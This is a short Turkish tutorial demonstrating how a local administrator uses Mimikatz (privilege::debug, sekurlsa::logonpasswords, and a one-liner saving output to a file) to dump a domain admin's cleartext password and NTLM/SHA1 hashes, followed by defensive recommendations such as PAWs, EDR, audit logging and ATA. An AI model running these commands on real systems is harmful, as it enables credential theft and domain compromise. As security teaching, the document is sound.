Mimikatz tool’u kullanılarak bir pc’de bulunan logon password’leri ve hash’leri tespit etmek için aşağıdaki senaryo uygulanır.

Senaryo:

Recep kullanıcısı kendi bilgisayarında local admin. Burak kullanıcısı ise domain admin ve AD Delegasyon ve Tier Modeling kurallarına uymayarak Tier 2 seviyesindeki bir bilgisayarda oturum açıyor. Recep’de Mimikatz kullanarak Burak’ın password’ünü yada hash’ini bulmak için,

Aşağıdaki komutlar kullanılır;

Mimikatz

Privilege::debug

Sekurlsa::logonpasswords

Sonuç:

• Burak kullanıcısının interactive logon yaptığı görülüyor.
• Burak kullanıcısının NTLM ve SHA1 Hash’i görülüyor.
• Burak kullanıcısının password’u Clear TEXT olarak görülüyor.

Not: Ayrıca aşağıdaki gibi kullanımı da bulunmaktadır.

mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit” >> c:\pc-7.txt

1. PAW (high secure workstation) kullanınız.
2. Anti virüs + EDR + Malware Detection kullanınız.
3. Aduit Log’ların doğru konfigüre edildiğinden ve aktif olduğundan emin olunuz.
4. ATA yada Azure ATP kullanınız.